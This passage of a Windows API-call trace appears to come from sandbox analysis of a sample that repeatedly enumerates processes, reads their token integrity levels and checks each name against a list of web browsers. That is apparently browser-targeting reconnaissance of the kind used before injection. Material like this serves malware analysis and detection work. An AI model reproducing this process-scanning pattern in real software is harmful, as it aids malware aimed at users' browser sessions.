out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0486.511] GetLastError () returned 0x7a [0486.511] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0486.511] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0486.511] CloseHandle (hObject=0x3bc) returned 1 [0486.511] CloseHandle (hObject=0x5a4) returned 1 [0486.511] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0486.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0486.511] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375b20, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">…") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0486.511] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0486.511] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0486.511] GetLastError () returned 0x7a [0486.511] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0486.511] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0486.511] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0486.511] CloseHandle (hObject=0x3bc) returned 1 [0486.511] CloseHandle (hObject=0x5a4) returned 1 [0486.511] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0486.511] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0486.511] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0486.511] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0486.511] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0486.511] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0486.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0486.512] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0486.512] GetLastError () returned 0x7a [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0486.512] CloseHandle (hObject=0x3bc) returned 1 [0486.512] CloseHandle (hObject=0x5a4) returned 1 [0486.512] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0486.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0486.512] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762e0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x86") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0486.512] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0486.512] GetLastError () returned 0x7a [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0486.512] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0486.512] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0486.512] CloseHandle (hObject=0x3bc) returned 1 [0486.512] CloseHandle (hObject=0x5a4) returned 1 [0486.512] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0486.512] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0486.512] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0486.512] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0486.512] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0486.512] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0486.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0486.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0486.512] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0486.512] GetLastError () returned 0x7a [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0486.512] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0486.512] CloseHandle (hObject=0x3bc) returned 1 [0486.512] CloseHandle (hObject=0x5a4) returned 1 [0486.512] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0486.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0486.513] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376928, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x87") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0486.513] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0486.513] GetLastError () returned 0x7a [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0486.513] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0486.513] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0486.513] CloseHandle (hObject=0x3bc) returned 1 [0486.513] CloseHandle (hObject=0x5a4) returned 1 [0486.513] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0486.513] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0486.513] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0486.513] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0486.513] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0486.513] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0486.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0486.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0486.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0486.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0486.513] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0486.513] GetLastError () returned 0x7a [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0486.513] CloseHandle (hObject=0x3bc) returned 1 [0486.513] CloseHandle (hObject=0x5a4) returned 1 [0486.513] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0486.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0486.513] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376cd0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x88") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0486.513] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0486.513] GetLastError () returned 0x7a [0486.513] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0486.513] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0486.513] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0486.513] CloseHandle (hObject=0x3bc) returned 1 [0486.513] CloseHandle (hObject=0x5a4) returned 1 [0486.514] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0486.514] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0486.514] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0486.514] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0486.514] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0486.514] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0486.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0486.514] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0486.514] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0488.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa3d8) returned 0xc0000004 [0488.522] VirtualAlloc (lpAddress=0x0, dwSize=0xb3d8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0488.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb3d8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0488.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0488.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0488.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0488.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0488.526] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0488.526] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0488.526] GetLastError () returned 0x7a [0488.526] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0488.526] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0488.526] CloseHandle (hObject=0x3bc) returned 1 [0488.526] CloseHandle (hObject=0x5a4) returned 1 [0488.526] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0488.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0488.527] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x89") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0488.527] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0488.527] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0488.527] GetLastError () returned 0x7a [0488.527] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0488.527] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0488.527] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0488.527] CloseHandle (hObject=0x3bc) returned 1 [0488.528] CloseHandle (hObject=0x5a4) returned 1 [0488.528] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0488.528] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0488.528] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0488.528] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0488.528] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0488.528] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0488.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0488.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0488.528] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0488.529] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0488.529] GetLastError () returned 0x7a [0488.529] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0488.529] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0488.529] CloseHandle (hObject=0x3bc) returned 1 [0488.529] CloseHandle (hObject=0x5a4) returned 1 [0488.529] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0488.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0488.529] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8a") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0488.530] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0488.530] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0488.530] GetLastError () returned 0x7a [0488.530] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0488.530] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0488.530] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0488.530] CloseHandle (hObject=0x3bc) returned 1 [0488.530] CloseHandle (hObject=0x5a4) returned 1 [0488.530] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0488.531] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0488.531] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0488.531] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0488.531] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0488.531] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0488.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0488.531] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0488.531] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0488.531] GetLastError () returned 0x7a [0488.531] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0488.532] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0488.532] CloseHandle (hObject=0x3bc) returned 1 [0488.532] CloseHandle (hObject=0x5a4) returned 1 [0488.532] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0488.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0488.532] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x8b") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0488.532] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0488.532] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0488.532] GetLastError () returned 0x7a [0488.533] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 